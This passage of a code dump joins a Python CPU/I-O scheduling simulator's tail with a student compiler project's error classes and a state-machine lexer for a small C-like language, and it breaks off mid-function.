        self.env.run()
class ProcessArrival(sim.Component):
    """Injects every workload process into the simulation at its arrival time.

    The simulator's process list is already sorted by arrival, so holding
    until each arrival time in order is sufficient.
    """

    def setup(self, simulator):
        self.simulator = simulator

    def process(self):
        for proc in self.simulator.processes:
            yield self.hold(till = proc.arrival)
            ProcessComponent(simulator = self.simulator, pid = proc.pid,
                             arrival = proc.arrival, bursts = proc.bursts)
class ProcessComponent(sim.Component):
    """One simulated process: alternates CPU and I/O bursts under the chosen
    scheduling policy, then prints its per-process summary line."""

    def setup(self, simulator, pid, arrival, bursts):
        self.simulator = simulator
        self.pid = pid
        self.arrival = arrival
        # bursts is an odd-length list: CPU bursts at even indices, I/O at odd.
        self.bursts = bursts
        self.ready_wait_time = 0  # total time spent queued for the CPU
        self.io_wait_time = 0     # total time spent queued for + using the I/O device

    def process(self):
        b = self.bursts
        clock_start = self.simulator.env.now()
        # Pairwise walk: CPU burst b[i-1] followed by I/O burst b[i] ...
        for i in range(1, len(b), 2):
            yield from self.__schedule_cpu_burst(b[i-1])
            yield from self.__schedule_io_burst(b[i])
        # ... plus the mandatory trailing CPU burst.
        yield from self.__schedule_cpu_burst(b[-1])
        tat = self.simulator.env.now() - clock_start
        # Output: pid arrival cpu_sum io_sum total_sum tat ready_wait io_wait
        print(self.pid, end = " ", file = self.simulator.ofile)
        print(self.arrival, end = " ", file = self.simulator.ofile)
        print(np.sum(b[0:len(b):2]), end = " ", file = self.simulator.ofile)
        print(np.sum(b[1:len(b):2]), end = " ", file = self.simulator.ofile)
        print(np.sum(b), end = " ", file = self.simulator.ofile)
        print(tat, end = " ", file = self.simulator.ofile)
        print(self.ready_wait_time, end = " ", file = self.simulator.ofile)
        print(self.io_wait_time, end = "\n", file = self.simulator.ofile)

    def __schedule_cpu_burst(self, burst):
        # Dispatch on the configured scheduling policy.
        if self.simulator.cpu_scheduler == "fcfs":
            yield from self.__queue_cpu(self.simulator.cpu)
            yield self.hold(duration = burst)
            self.release(self.simulator.cpu)
        elif self.simulator.cpu_scheduler == "rr":
            # Round robin: run quantum-sized slices, re-queueing between them.
            s = burst
            while s > self.simulator.quantum:
                yield from self.__queue_cpu(self.simulator.cpu)
                yield self.hold(duration = self.simulator.quantum)
                self.release(self.simulator.cpu)
                s -= self.simulator.quantum
            yield from self.__queue_cpu(self.simulator.cpu)
            yield self.hold(duration = s)
            self.release(self.simulator.cpu)
        elif self.simulator.cpu_scheduler == "sjf":
            # salabim request spec tuple is (resource, quantity, priority);
            # using the burst length as priority serves shorter bursts first.
            yield from self.__queue_cpu((self.simulator.cpu, 1, burst))
            yield self.hold(duration = burst)
            self.release(self.simulator.cpu)
        elif self.simulator.cpu_scheduler == "srtf":
            # Preemptive: if bumped off the CPU mid-hold, subtract the time
            # actually run (now - mode_time) and re-request with the shorter
            # remaining time as the priority.
            s = burst
            while True:
                yield from self.__queue_cpu((self.simulator.cpu, 1, s))
                yield self.hold(duration = s, mode = "")
                if not self.isbumped():
                    break
                s -= self.simulator.env.now() - self.mode_time()
                yield self.standby()
            self.release(self.simulator.cpu)
        else:
            raise ValueError("Unknown cpu_scheduler")

    def __queue_cpu(self, arg):
        # Accumulate time spent waiting in the ready queue.
        ready_wait_start = self.simulator.env.now()
        yield self.request(arg)
        self.ready_wait_time += self.simulator.env.now() - ready_wait_start

    def __schedule_io_burst(self, burst):
        # FCFS I/O; io_wait_time includes both queueing and the burst itself.
        io_start = self.simulator.env.now()
        yield self.request(self.simulator.io)
        yield self.hold(duration = burst)
        self.release(self.simulator.io)
        self.io_wait_time += self.simulator.env.now() - io_start
def main(cpu_scheduler, quantum, input_file, output_file):
    """Programmatic entry point used by the batch test runner: read one
    workload, simulate it with the given scheduler, write results."""
    workload = read_workload(file = input_file)
    run = Simulator(processes = workload, cpu_scheduler = cpu_scheduler,
                    quantum = quantum, ofile = output_file)
    run.run()
# Command-line entry point: parse arguments, read the workload and run one
# simulation.  (The old unused `output_file = sys.stdout if ...` local was
# dead code — Simulator already defaults a None ofile to stdout.)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description = "CPU and I/O scheduling simulator")
    parser.add_argument("--cpu-scheduler", choices = ["fcfs", "rr", "sjf", "srtf"], required = True, help = "CPU scheduler")
    parser.add_argument("--quantum", type=float, default = None, help = "Quantum parameter (required only by round robin cpu scheduler)")
    parser.add_argument("--input-file", metavar = "FILE", default = None, help = "Input file, if it is not set the data is read from stdin")
    parser.add_argument("--output-file", metavar = "FILE", default = None, help = "Output file, if it is not set the data is printed to stdout")
    args = parser.parse_args(sys.argv[1:])
    processes = read_workload(file = args.input_file)
    simulator = Simulator(processes = processes, cpu_scheduler = args.cpu_scheduler, quantum = args.quantum, ofile = args.output_file)
    simulator.run()
|
[
"/gen_workload.py",
"/run_tests.py",
"/simulator.py"
] |
00riddle00/BSc3-Compilers
|
from abc import abstractmethod
from pprint import pprint
from termcolor import cprint
# Token-type -> human-readable spelling, used when printing parser errors.
# Restored values that had their '<'/'>' characters stripped (OP_G/OP_GE/
# OP_L/OP_LE, the '==>' return arrow and the '->' member access operator);
# the correct spellings follow the lexer's KEYWORDS table and operator rules.
user_friendly_names = {
    'KW_INCLUDE': '@',
    'KW_FN': 'fx',
    'KW_FN_RET_ARROW': '==>',
    'KW_FN_IN': 'in',
    'KW_FN_OUT': 'out',
    'KW_IF': 'if',
    'KW_ELIF': 'elif',
    'KW_ELSE': 'else',
    'KW_FOR': 'for',
    'KW_WHILE': 'while',
    'KW_BREAK': 'break',
    'KW_CONTINUE': 'continue',
    'KW_RETURN': 'return',
    'KW_VOID': 'void',
    'KW_INT': 'int',
    'KW_FLOAT': 'float',
    'KW_BOOL': 'bool',
    'KW_CHAR': 'char',
    'KW_STR': 'string',
    'KW_STRUCT': 'struct',
    'KW_NULL': 'NULL',
    'KW_TRUE': 'True',
    'KW_FALSE': 'False',
    'KW_AND': 'AND',
    'KW_OR': 'OR',
    'IDENT': 'identifier',
    'LIT_INT': 'int literal',
    'LIT_FLOAT': 'float literal',
    'LIT_CHAR': 'char literal',
    'LIT_STR': 'string literal',
    'OP_G': '>',
    'OP_GE': '>=',
    'OP_L': '<',
    'OP_LE': '<=',
    'OP_IS_EQ': '==',
    'OP_IS_NEQ': '!=',
    'OP_SUM': '+',
    'OP_SUB': '-',
    'OP_MUL': '*',
    'OP_DIV': '/',
    'OP_MOD': '%',
    'OP_NOT': '!',
    'OP_INCR': '++',
    'OP_DECR': '--',
    'OP_ASSIGN_EQ': '=',
    'OP_ASSIGN_SUM': '+=',
    'OP_ASSIGN_SUB': '-=',
    'OP_ASSIGN_MUL': '*=',
    'OP_ASSIGN_DIV': '/=',
    'OP_ASSIGN_MOD': '%=',
    'OP_PTR': '$',
    'OP_PTR_ADDR': '&',
    'OP_DOT_ACCESS_MEMBER': '.',
    'OP_PTR_ACCESS_MEMBER': '->',
    'OP_PAREN_O': '(',
    'OP_PAREN_C': ')',
    'OP_BRACE_O': '{',
    'OP_BRACE_C': '}',
    'OP_BRACKET_O': '[',
    'OP_BRACKET_C': ']',
    'OP_SEMICOLON': ';',
    'OP_COMMA': ',',
}
class CompilerError(Exception):
    """Base class for every diagnostic the compiler raises.

    Now derives from Exception (not BaseException) so generic
    ``except Exception`` handlers and tooling see it, per Python convention,
    and forwards msg to Exception.__init__ so str(e) is meaningful.

    msg: human-readable description; file/line/pos: source location (optional).
    """

    def __init__(self, msg, file=None, line=None, pos=None):
        super().__init__(msg)
        self.msg = msg
        self.file = file
        self.line = line
        self.pos = pos

    # NOTE(review): without an ABCMeta metaclass @abstractmethod is not
    # enforced at instantiation time; it only documents the intent.
    @abstractmethod
    def print_err(self):
        pass
class SemanticError(CompilerError):
    """Raised/printed for name-resolution and type-checking failures."""

    def print_err(self):
        # todo: factor the bold-red printing into a shared helper
        location = f'{self.file}:{self.line}:{self.pos}'
        cprint(f'SemanticERROR: {location} {self.msg}', 'red', attrs=['bold'])
class InputError(CompilerError):
    """Raised when a source file cannot be read or constructor args are bad."""

    def print_err(self):
        text = f'[InputERROR] [{self.msg}]'
        cprint(text, 'red', attrs=['bold'])
class LexerError(CompilerError):
    """Raised for lexical errors (bad characters, unterminated literals)."""

    def print_err(self):
        location = f'{self.file}:{self.line}:{self.pos}'
        cprint(f'LexerERROR: {location} {self.msg}', 'red', attrs=['bold'])
class LexerDebugError(LexerError):
    """LexerError enriched with the lexer's internal state for debugging dumps."""

    def __init__(self, msg, file=None, line=None, pos=None, state=None,
                 curr_char=None, buffer=None):
        super().__init__(msg, file, line, pos)
        self.state = state
        self.curr_char = curr_char
        self.buffer = buffer

    def print_err(self):
        # Plain prints (not cprint): this is a raw internal debugging dump.
        side = 33 * '!'
        edge = 5 * '!'
        print(f'{side} [Lexer error] {side}')
        print(f'{edge} [file={self.file}: line={self.line}: position={self.pos}]')
        print(f'{edge} [Error message]: {self.msg}')
        if self.buffer:
            print(f'{edge} [Item being lexed (pretty print)]:')
            pprint(self.buffer + self.curr_char)
        print(f'{edge} [state]: {self.state}')
        print(f'{edge} [output so far]:')
        print(81 * '!')
class ParserError(CompilerError):
    """Raised for syntax errors: expected one token type, found another.

    exp_token / curr_token are token-type names (keys of user_friendly_names);
    unknown names now fall back to themselves instead of raising KeyError
    while reporting the error (the old code only had a fallback for exp_token).
    """

    def __init__(self, msg, file=None, line=None, pos=None, exp_token=None, curr_token=None):
        super().__init__(msg, file, line, pos)
        self.exp_token = exp_token
        self.curr_token = curr_token

    def print_err(self):
        exp = user_friendly_names.get(self.exp_token, self.exp_token)
        found = user_friendly_names.get(self.curr_token, self.curr_token)
        cprint(f'ParserERROR: {self.file}:{self.line}:{self.pos} '
               f'expected({exp}), found({found})',
               'red', attrs=['bold'])
class ParserDebugError(ParserError):
    """Debug-level parser error; currently identical to ParserError."""
    pass
class InternalError(CompilerError):
    """Signals a compiler bug (unreachable state, missing override) —
    not a problem in the user's source code, hence no file/line/pos."""

    def __init__(self, msg):
        super().__init__(msg)

    def print_err(self):
        text = f'InternalERROR: {self.msg}'
        cprint(text, 'yellow', attrs=['bold'])
--- FILE SEPARATOR ---
from .lexer import Input, Lexer, Token
--- FILE SEPARATOR ---
from errors import LexerError, LexerDebugError, InputError
from termcolor import cprint
# List of all lexemes
# <KW_INCLUDE> // not implemented
# <KW_FN>
# <KW_FN_RET_ARROW>
# <KW_FN_IN>
# <KW_FN_OUT>
# <KW_IF>
# <KW_ELIF>
# <KW_ELSE>
# <KW_FOR>
# <KW_WHILE>
# <KW_BREAK>
# <KW_CONTINUE>
# <KW_RETURN>
# <KW_VOID>
# <KW_INT>
# <KW_FLOAT>
# <KW_BOOL>
# <KW_CHAR>
# <KW_STR>
# <KW_STRUCT>
# <KW_NULL>
# <KW_TRUE>
# <KW_FALSE>
# <KW_AND>
# <KW_OR>
# <IDENT>
# <LIT_INT>
# <LIT_FLOAT>
# <LIT_CHAR>
# <LIT_STR>
# <OP_G>
# <OP_GE>
# <OP_L>
# <OP_LE>
# <OP_IS_EQ>
# <OP_IS_NEQ>
# <OP_SUM>
# <OP_SUB>
# <OP_MUL>
# <OP_DIV>
# <OP_MOD>
# <OP_NOT>
# <OP_INCR>
# <OP_DECR>
# <OP_ASSIGN_EQ>
# <OP_ASSIGN_SUM>
# <OP_ASSIGN_SUB>
# <OP_ASSIGN_MUL>
# <OP_ASSIGN_DIV>
# <OP_ASSIGN_MOD>
# <OP_PTR>
# <OP_PTR_ADDR>
# <OP_DOT_ACCESS_MEMBER>
# <OP_PTR_ACCESS_MEMBER> // not implemented
# <OP_PAREN_O>
# <OP_PAREN_C>
# <OP_BRACE_O>
# <OP_BRACE_C>
# <OP_BRACKET_O>
# <OP_BRACKET_C>
# <OP_SEMICOLON>
# <OP_COMMA>
# Source spelling -> token-type name.  complete_ident() consults this table
# to promote a finished identifier to a keyword token; lex_op_is_eq() looks
# up '==>' directly for the function return arrow.
KEYWORDS = {
    'fx': 'KW_FN',
    # 'in': 'KW_FN_IN', # see this inbuilt fn name just as ident
    # 'out': 'KW_FN_OUT', # see this inbuilt fn name just as ident
    'if': 'KW_IF',
    'elif': 'KW_ELIF',
    'else': 'KW_ELSE',
    'for': 'KW_FOR',
    'while': 'KW_WHILE',
    'break': 'KW_BREAK',
    'continue': 'KW_CONTINUE',
    'return': 'KW_RETURN',
    '==>': 'KW_FN_RET_ARROW',
    'void': 'KW_VOID',
    'int': 'KW_INT',
    'float': 'KW_FLOAT',
    'bool': 'KW_BOOL',
    'char': 'KW_CHAR',
    'string': 'KW_STR',
    'struct': 'KW_STRUCT',
    'NULL': 'KW_NULL',
    'True': 'KW_TRUE',
    'False': 'KW_FALSE',
    'AND': 'KW_AND',
    'OR': 'KW_OR',
}
class Input:
    """One source file loaded into memory plus a read cursor over it.

    Tracks enough position state (offset of the previous newline, current
    line number, token start column) for the lexer to report file:line:pos.
    Raises InputError for a non-str filename or an unreadable file.
    """
    name: str
    text: str
    offset: int               # index of the next character to read
    offset_prev_line: int     # offset just after the most recent newline
    offset_token_start: int   # column where the current token began
    pos: int
    curr_ln: int
    size: int

    def __init__(self, filename):
        if not isinstance(filename, str):
            raise InputError(f"Wrong argument type passed to Input constructor: exp=str, got={type(filename)}")
        self.name = filename
        try:
            with open(self.name) as f:
                self.text = f.read()  # read() replaces ''.join(f.readlines())
        except OSError as e:  # OSError is the modern spelling of IOError
            raise InputError(e)
        self.size = len(self.text)
        self.curr_ln = 1
        self.offset = 0
        self.offset_prev_line = 0
        self.offset_token_start = 0

    def read_char(self):
        """Return the next character and advance the cursor."""
        char = self.text[self.offset]
        self.offset += 1
        return char

    def reverse_read(self, delta=1):
        """Push *delta* characters back so they get read again."""
        self.offset -= delta

    def is_input_read(self):
        """True once the whole text has been consumed."""
        return self.offset >= self.size

    def next_line(self):
        """Record that a newline was consumed: bump line, reset columns."""
        self.offset_prev_line = self.offset
        self.curr_ln += 1
        self.offset_token_start = 0

    def get_char_pos(self):
        """1-based column of the character just read on the current line."""
        return self.offset - self.offset_prev_line

    def get_char_info(self):
        """[filename, line, column] triple used for error reporting."""
        return [self.name, self.curr_ln, self.get_char_pos()]
class Token:
    """A single lexical token together with the source position it came from."""
    type_: str
    value: str
    file: str
    line_no: int
    pos: int

    def __init__(self, type_, value, file, line_no, pos):
        # Stored as .type (the trailing underscore only avoids shadowing
        # the builtin in the parameter list).
        self.type = type_
        self.value = value
        self.file, self.line_no, self.pos = file, line_no, pos

    def get_char_info(self):
        """[file, line, column] — same shape as Input.get_char_info()."""
        return [self.file, self.line_no, self.pos]
class Lexer:
    """Character-at-a-time state-machine lexer.

    lex_all() walks every queued Input, dispatching each character through
    lex_char() according to self.state; finished tokens accumulate in
    self.tokens.  '@path' include directives append new Inputs to the queue
    while it is being iterated, so included files are lexed in turn.

    Fixes over the previous revision:
      * EOF inside a char escape checked the nonexistent state 'LIT_CHAR_ESC'
        (real state name: 'LIT_CHAR_ESCAPE'), so it was never reported.
      * ')' completed immediately, leaving lex_op_paren_close() unreachable;
        it now begins the OP_PAREN_C state exactly like ']' does, so `).member`
        lexes as member access instead of starting a float literal.
      * lex_op_bracket_close/lex_op_paren_close silently consumed the lookahead
        character when it was not '.'; it is now pushed back and re-lexed.
      * err() no longer crashes with AttributeError when called before
        lex_all() has set curr_input (e.g. bad constructor arguments).
    """
    inputs: list
    curr_input: "Input"  # string annotation: Input is defined earlier in this module
    buffer: str
    state: str
    tokens: list
    running: bool
    curr_char: str

    def __init__(self, inputs) -> None:
        if not isinstance(inputs, list):
            self.err(
                f"Wrong argument type passed to Lexer constructor: exp=[Input, Input, ...], got={type(inputs)}")
        for i, _input in enumerate(inputs):
            if not isinstance(_input, Input):
                self.err(
                    f'Input list has an element (index={i}) of incorrect type: exp=Input, got={type(_input)}')
        self.inputs = inputs
        self.buffer = ''        # characters of the token being built
        self.state = 'START'
        self.tokens = []
        self.token_start_ln = 1
        self.running = True
        self.curr_char = ''

    # --- token construction helpers ------------------------------------

    def add(self):
        """Append the current character to the token buffer."""
        self.buffer += self.curr_char

    def begin_token(self, new_state):
        """Remember where a token starts and switch the machine to new_state."""
        self.curr_input.offset_token_start = self.curr_input.get_char_pos()
        self.token_start_ln = self.curr_input.curr_ln
        self.state = new_state

    def complete_ident(self):
        """Finish an identifier, promoting it to a keyword token if it matches."""
        if self.buffer in KEYWORDS:
            token_type = KEYWORDS[self.buffer]
            # NOTE(review): keyword tokens are emitted with an empty value;
            # the spelling is recoverable from the token type.
            self.buffer = ''
        else:
            token_type = 'IDENT'
        self.complete_token(token_type, delta=1)

    def complete_token_at_once(self, token_type):
        """Emit a token for exactly the current character."""
        self.curr_input.offset_token_start = self.curr_input.get_char_pos()
        self.complete_token(token_type)

    def complete_token(self, token_type, delta=0):
        """Emit the buffered token; delta > 0 pushes characters back to re-lex."""
        self.tokens.append(
            Token(token_type, self.buffer, self.curr_input.name, self.curr_input.curr_ln,
                  self.curr_input.offset_token_start))
        self.buffer = ''
        self.state = 'START'
        if delta:
            self.curr_input.reverse_read(delta)

    # --- driver ---------------------------------------------------------

    def lex_all(self):
        """Lex every queued Input; '@' includes may extend the queue mid-loop."""
        for _input in self.inputs:
            self.curr_input = _input
            while self.running and not self.curr_input.is_input_read():
                self.curr_char = self.curr_input.read_char()
                self.lex_char()
            # End of this input: flush the state we stopped in, or report it.
            self.curr_char = 'EOF'
            if self.state == 'START':
                self.complete_token_at_once('EOF')
            elif self.state in ('COMMENT_ML', 'COMMENT_ML_MINUS_1', 'COMMENT_ML_MINUS_2'):
                self.err('unterminated comment')
            elif self.state in ('LIT_FLOAT_E', 'LIT_FLOAT_E_SIGN'):
                self.err('unterminated float expression')
            elif self.state in ('LIT_CHAR', 'LIT_CHAR_ADDED'):
                self.err('unterminated char')
            elif self.state == 'LIT_STR':
                self.err('unterminated string')
            elif self.state in ('LIT_CHAR_ESCAPE', 'LIT_STR_ESCAPE'):
                # BUGFIX: was 'LIT_CHAR_ESC', a state name nothing ever sets.
                self.err('unterminated escape symbol')
            else:
                # A token is in progress; let it self-complete on the EOF marker.
                self.lex_char()
                self.complete_token_at_once('EOF')

    def lex_start(self):
        """Dispatch the first character of a new token."""
        if self.is_ident_head():
            self.add()
            self.begin_token('IDENT')
        elif self.is_digit():
            self.add()
            self.begin_token('LIT_INT')
        elif self.curr_char == '.':
            self.add()
            self.begin_token('LIT_FLOAT')
        elif self.curr_char == "'":
            self.begin_token('LIT_CHAR')
        elif self.curr_char == '"':
            self.begin_token('LIT_STR')
        elif self.curr_char == '+':
            self.begin_token('OP_SUM')
        elif self.curr_char == '-':
            self.begin_token('OP_SUB')
        elif self.curr_char == '*':
            self.begin_token('OP_MUL')
        elif self.curr_char == '/':
            self.begin_token('OP_DIV')
        elif self.curr_char == '%':
            self.begin_token('OP_MOD')
        elif self.curr_char == '<':
            self.begin_token('OP_L')
        elif self.curr_char == '>':
            self.begin_token('OP_G')
        elif self.curr_char == '=':
            self.begin_token('OP_ASSIGN_EQ')
        elif self.curr_char == '!':
            self.begin_token('OP_NOT')
        elif self.curr_char == '(':
            self.complete_token_at_once('OP_PAREN_O')
        elif self.curr_char == ')':
            # BUGFIX: begin a state (like ']') so `).member` lexes as member
            # access via lex_op_paren_close, which was previously unreachable.
            self.begin_token('OP_PAREN_C')
        elif self.curr_char == '{':
            self.complete_token_at_once('OP_BRACE_O')
        elif self.curr_char == '}':
            self.complete_token_at_once('OP_BRACE_C')
        elif self.curr_char == '[':
            self.complete_token_at_once('OP_BRACKET_O')
        elif self.curr_char == ']':
            self.begin_token('OP_BRACKET_C')
        elif self.curr_char == ';':
            self.complete_token_at_once('OP_SEMICOLON')
        elif self.curr_char == ',':
            self.complete_token_at_once('OP_COMMA')
        elif self.curr_char == '$':
            self.complete_token_at_once('OP_PTR')
        elif self.curr_char == '&':
            self.complete_token_at_once('OP_PTR_ADDR')
        elif self.curr_char == '@':
            self.begin_token('INCLUDE')
        elif self.curr_char == '#':
            self.state = 'COMMENT_START'
        elif self.curr_char == ' ':
            pass  # ignore
        elif self.curr_char == '\n':
            self.curr_input.next_line()
        elif self.curr_char == '\t':
            pass  # ignore
        elif self.curr_char == '\r':
            pass  # ignore
        else:
            self.err('invalid character, usable only as char or inside a string')

    def lex_char(self):
        """Route the current character to the handler for the current state."""
        if self.state == 'START':
            self.lex_start()
        elif self.state == 'IDENT':
            self.lex_ident()
        elif self.state == 'STRUCT_MEMBER_IDENT':
            self.lex_struct_member_ident()
        elif self.state == 'LIT_INT':
            self.lex_lit_int()
        elif self.state == 'LIT_FLOAT':
            self.lex_lit_float()
        elif self.state == 'LIT_FLOAT_E':
            self.lex_lit_float_e()
        elif self.state == 'LIT_FLOAT_E_SIGN':
            self.lex_lit_float_e_sign()
        elif self.state == 'LIT_FLOAT_W_E':
            self.lex_lit_float_w_e()
        elif self.state == 'LIT_CHAR':
            self.lex_lit_char()
        elif self.state == 'LIT_CHAR_ESCAPE':
            self.lex_lit_char_escape()
        elif self.state == 'LIT_CHAR_ADDED':
            self.lex_lit_char_added()
        elif self.state == 'LIT_STR':
            self.lex_lit_str()
        elif self.state == 'LIT_STR_ESCAPE':
            self.lex_lit_str_escape()
        elif self.state == 'OP_SUM':
            self.lex_op_sum()
        elif self.state == 'OP_SUB':
            self.lex_op_sub()
        elif self.state == 'OP_MUL':
            self.lex_op_mul()
        elif self.state == 'OP_DIV':
            self.lex_op_div()
        elif self.state == 'OP_MOD':
            self.lex_op_mod()
        elif self.state == 'OP_L':
            self.lex_op_l()
        elif self.state == 'OP_G':
            self.lex_op_g()
        elif self.state == 'OP_ASSIGN_EQ':
            self.lex_op_assign_eq()
        elif self.state == 'OP_IS_EQ':
            self.lex_op_is_eq()
        elif self.state == 'OP_NOT':
            self.lex_op_not()
        elif self.state == 'OP_BRACKET_C':
            self.lex_op_bracket_close()
        elif self.state == 'OP_PAREN_C':
            self.lex_op_paren_close()
        elif self.state == 'INCLUDE':
            self.lex_include()
        elif self.state == 'COMMENT_START':
            self.lex_comment_start()
        elif self.state == 'COMMENT_SL':
            self.lex_comment_sl()
        elif self.state == 'COMMENT_SL_PLUS_2':
            self.lex_comment_sl_plus_2()
        elif self.state == 'COMMENT_ML':
            self.lex_comment_ml()
        elif self.state == 'COMMENT_ML_MINUS_1':
            self.lex_comment_ml_minus_1()
        elif self.state == 'COMMENT_ML_MINUS_2':
            self.lex_comment_ml_minus_2()
        else:
            self.err(f'invalid state {self.state}')

    # lex identifiers
    def lex_ident(self):
        if self.is_letter():
            self.add()
        elif self.is_digit():
            self.add()
        elif self.curr_char == '_':
            self.add()
        elif self.curr_char == '.':
            # Identifier followed by '.' means struct member access.
            self.complete_token('IDENT')
            self.add()
            self.state = 'STRUCT_MEMBER_IDENT'
        else:
            self.complete_ident()

    def lex_struct_member_ident(self):
        # The buffer holds '.'; a valid member name must follow.
        if self.is_ident_head():
            self.complete_token('OP_DOT_ACCESS_MEMBER')
            self.add()
            self.state = 'IDENT'
        else:
            self.err('invalid struct member ident')

    # lex type literals
    def lex_lit_int(self):
        if self.is_digit():
            self.add()
        elif self.curr_char == '.':
            self.add()
            self.state = 'LIT_FLOAT'
        elif self.is_ident_head():
            self.err('invalid int suffix')
        else:
            self.complete_token('LIT_INT', delta=1)

    def lex_lit_float(self):
        if self.is_digit():
            self.add()
        elif self.curr_char == 'e':
            self.add()
            self.state = 'LIT_FLOAT_E'
        else:
            self.complete_token('LIT_FLOAT', delta=1)

    def lex_lit_float_e(self):
        # Right after 'e': a digit or an explicit exponent sign is required.
        if self.is_digit():
            self.add()
            self.state = 'LIT_FLOAT_W_E'
        elif self.curr_char in ['+', '-']:
            self.add()
            self.state = 'LIT_FLOAT_E_SIGN'
        else:
            self.err('Invalid float exponent')

    def lex_lit_float_e_sign(self):
        # Right after 'e+'/'e-': at least one digit is required.
        if self.is_digit():
            self.add()
            self.state = 'LIT_FLOAT_W_E'
        else:
            self.err('Invalid float exponent')

    def lex_lit_float_w_e(self):
        if self.is_digit():
            self.add()
        else:
            self.complete_token('LIT_FLOAT', delta=1)

    def lex_lit_char(self):
        if self.curr_char == "'":
            self.complete_token('LIT_CHAR')
        elif self.curr_char == '\\':
            self.state = 'LIT_CHAR_ESCAPE'
        elif self.curr_char in ['\n', '\r', '\t']:
            self.err('char type cannot contain newlines, tabstops or'
                     ' carriage returns')
        else:
            self.add()
            self.state = 'LIT_CHAR_ADDED'

    def lex_lit_char_escape(self):
        # NOTE(review): unlike string escapes, char escapes keep the backslash
        # in the token value ('\\n' not '\n') — confirm this asymmetry is wanted.
        if self.curr_char == "'":
            self.buffer += "'"
        elif self.curr_char == '\\':
            self.buffer += '\\'
        elif self.curr_char == 'n':
            self.buffer += '\\n'
        elif self.curr_char == 'r':
            self.buffer += '\\r'
        elif self.curr_char == 't':
            self.buffer += '\\t'
        else:
            self.buffer += "\\"
            self.err(f'invalid escape sequence used in a char: \\{self.curr_char}')
        self.state = 'LIT_CHAR_ADDED'

    def lex_lit_char_added(self):
        if self.curr_char == "'":
            self.complete_token('LIT_CHAR')
        else:
            self.err('char type cannot consist of multiple chars')

    def lex_lit_str(self):
        if self.curr_char == '"':
            self.complete_token('LIT_STR')
        elif self.curr_char == '\\':
            self.state = 'LIT_STR_ESCAPE'
        elif self.curr_char == '\n':
            # Literal newlines are allowed inside strings; keep line count right.
            self.add()
            self.curr_input.next_line()
        else:
            self.add()

    def lex_lit_str_escape(self):
        if self.curr_char == '"':
            self.buffer += '"'
        elif self.curr_char == "\\":
            self.buffer += "\\"
        elif self.curr_char == 'n':
            self.buffer += "\n"
        elif self.curr_char == 'r':
            self.buffer += "\r"
        elif self.curr_char == 't':
            self.buffer += "\t"
        else:
            self.buffer += "\\"
            self.err(f'invalid escape sequence used in a string: \\{self.curr_char}')
        self.state = 'LIT_STR'

    # lex operators
    def lex_op_sum(self):
        if self.curr_char == '+':
            self.complete_token('OP_INCR')
        elif self.curr_char == '=':
            self.complete_token('OP_ASSIGN_SUM')
        elif self.is_digit():
            # '+5' folds the sign into an int literal.
            self.add()
            self.state = 'LIT_INT'
        else:
            self.complete_token('OP_SUM', delta=1)

    def lex_op_sub(self):
        if self.curr_char == '-':
            self.complete_token('OP_DECR')
        elif self.curr_char == '=':
            self.complete_token('OP_ASSIGN_SUB')
        elif self.is_digit():
            # '-5' folds the sign into an int literal.
            self.add()
            self.state = 'LIT_INT'
        else:
            self.buffer = ''
            self.complete_token('OP_SUB', delta=1)

    def lex_op_mul(self):
        if self.curr_char == '=':
            self.complete_token('OP_ASSIGN_MUL')
        else:
            self.complete_token('OP_MUL', delta=1)

    def lex_op_div(self):
        if self.curr_char == '=':
            self.complete_token('OP_ASSIGN_DIV')
        else:
            self.complete_token('OP_DIV', delta=1)

    def lex_op_mod(self):
        if self.curr_char == '=':
            self.complete_token('OP_ASSIGN_MOD')
        else:
            self.complete_token('OP_MOD', delta=1)

    def lex_op_l(self):
        if self.curr_char == '=':
            self.complete_token('OP_LE')
        else:
            self.complete_token('OP_L', delta=1)

    def lex_op_g(self):
        if self.curr_char == '=':
            self.complete_token('OP_GE')
        else:
            self.complete_token('OP_G', delta=1)

    def lex_op_assign_eq(self):
        if self.curr_char == '=':
            self.state = 'OP_IS_EQ'
        else:
            self.complete_token('OP_ASSIGN_EQ', delta=1)

    def lex_op_is_eq(self):
        if self.curr_char == '>':
            # '==>' is the function return arrow keyword.
            self.complete_token(KEYWORDS['==>'])
        else:
            self.complete_token('OP_IS_EQ', delta=1)

    def lex_op_not(self):
        if self.curr_char == '=':
            self.complete_token('OP_IS_NEQ')
        else:
            self.complete_token('OP_NOT', delta=1)

    def lex_op_bracket_close(self):
        if self.curr_char == '.':
            self.complete_token('OP_BRACKET_C')
            self.add()
            self.state = 'STRUCT_MEMBER_IDENT'
        else:
            # BUGFIX: push the lookahead back so it is lexed from START
            # (it used to be silently dropped, e.g. the ';' in 'a[i];').
            self.complete_token('OP_BRACKET_C', delta=1)

    def lex_op_paren_close(self):
        if self.curr_char == '.':
            self.complete_token('OP_PAREN_C')
            self.add()
            self.state = 'STRUCT_MEMBER_IDENT'
        else:
            # BUGFIX: same push-back as lex_op_bracket_close.
            self.complete_token('OP_PAREN_C', delta=1)

    # lex include keyword
    def lex_include(self):
        # '@path' up to end of line: queue the named file for lexing.
        if self.curr_char == '\n':
            self.curr_input.next_line()
            self.state = 'START'
            new_input = Input(self.buffer)
            self.buffer = ''
            self.inputs.append(new_input)
        else:
            self.add()

    # lex comments
    def lex_comment_start(self):
        # '#...' is single-line; '###' opens a multi-line comment.
        if self.curr_char == '\n':
            self.curr_input.next_line()
            self.state = 'START'
        elif self.curr_char == '#':
            self.state = 'COMMENT_SL_PLUS_2'
        else:
            self.state = 'COMMENT_SL'

    def lex_comment_sl(self):
        if self.curr_char == '\n':
            self.curr_input.next_line()
            self.state = 'START'
        else:
            pass  # ignore

    def lex_comment_sl_plus_2(self):
        if self.curr_char == '\n':
            self.curr_input.next_line()
            self.state = 'START'
        elif self.curr_char == '#':
            self.state = 'COMMENT_ML'
        else:
            self.state = 'COMMENT_SL'

    def lex_comment_ml(self):
        # Inside '### ... ###'; count '#' characters towards the closer.
        if self.curr_char == '#':
            self.state = 'COMMENT_ML_MINUS_1'
        elif self.curr_char == '\n':
            self.curr_input.next_line()
        else:
            pass  # ignore

    def lex_comment_ml_minus_1(self):
        if self.curr_char == '#':
            self.state = 'COMMENT_ML_MINUS_2'
        elif self.curr_char == '\n':
            self.curr_input.next_line()
            self.state = 'COMMENT_ML'
        else:
            self.state = 'COMMENT_ML'

    def lex_comment_ml_minus_2(self):
        if self.curr_char == '#':
            self.state = 'START'
        elif self.curr_char == '\n':
            self.curr_input.next_line()
            self.state = 'COMMENT_ML'
        else:
